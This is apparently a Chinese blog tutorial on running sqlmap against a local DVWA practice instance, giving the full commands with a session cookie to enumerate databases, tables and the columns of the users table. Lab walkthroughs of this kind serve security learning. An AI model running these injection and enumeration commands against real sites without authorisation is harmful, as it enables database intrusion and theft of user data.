使用SQLmap对dvwa进行SQL注入测试
SQLmap工具github鏈接:https://github.com/sqlmapproject/sqlmap
- 搭建dvwa環(huán)境并啟動。
- windows上需要搭建Python環(huán)境,下載sqlmap包并解壓。。
- 設(shè)置dvwa級別為low(medium,high都可以,不要設(shè)成impossible就行)
- 打開dvwa的SQL Injection,打開瀏覽器調(diào)試,輸入user id并submit,查看攔截到的請求。
- 可以看到是一條GET請求,url是“http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#”,cookie里有”security=low; PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”
- 我們先只用url試試
結(jié)果是跳轉(zhuǎn)到登錄頁面,看來是需要帶cookie的 。 - 這次我們加上cookie
python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”
這次看樣子成功了,但是中間會不斷需要輸入y/n - 我們在后面加上參數(shù)–batch
python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch
- 使用–dbs獲取其所有的數(shù)據(jù)庫
python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs
- 使用-D xxx指定查看的數(shù)據(jù)庫,用–tables查看該數(shù)據(jù)庫的所有表
python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa --tables
- 使用-D xxx -T ttt指定查看的表,用–columns查看表的列
python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa -T users --columns
參考文章:https://blog.csdn.net/huilan_same/article/details/68067550
總結(jié)
以上是生活随笔為你收集整理的使用SQLmap对dvwa进行SQL注入测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SQL注入手工注入常用的语句
- 下一篇: SQLMAP注入教程-11种常见SQLM